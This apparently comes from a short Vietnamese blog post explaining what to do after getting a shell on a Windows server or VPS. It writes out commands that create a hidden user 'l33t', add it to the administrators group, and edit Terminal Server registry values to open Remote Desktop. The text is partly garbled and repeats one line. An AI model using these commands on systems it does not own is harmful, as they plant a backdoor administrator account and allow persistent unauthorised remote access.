đầu tiên execute command trên con shell đó >
l33t=username p4$sword=password Bây giờ để truy cập quản trị cho người sử dụng của bạn> excute command
Sau đó thực hiện kết nối tới VPS
Nếu VPS một ip tĩnh nhưng không kết nối vào (mstsc) sử dụng các lệnh để cho phép người dùng từ xa:
net user l33t p4$sword /add
l33t=username p4$sword=password Bây giờ để truy cập quản trị cho người sử dụng của bạn> excute command
Code:
net localgroup administrators l33t /add
Code:
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
Code:
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
Không có nhận xét nào:
Đăng nhận xét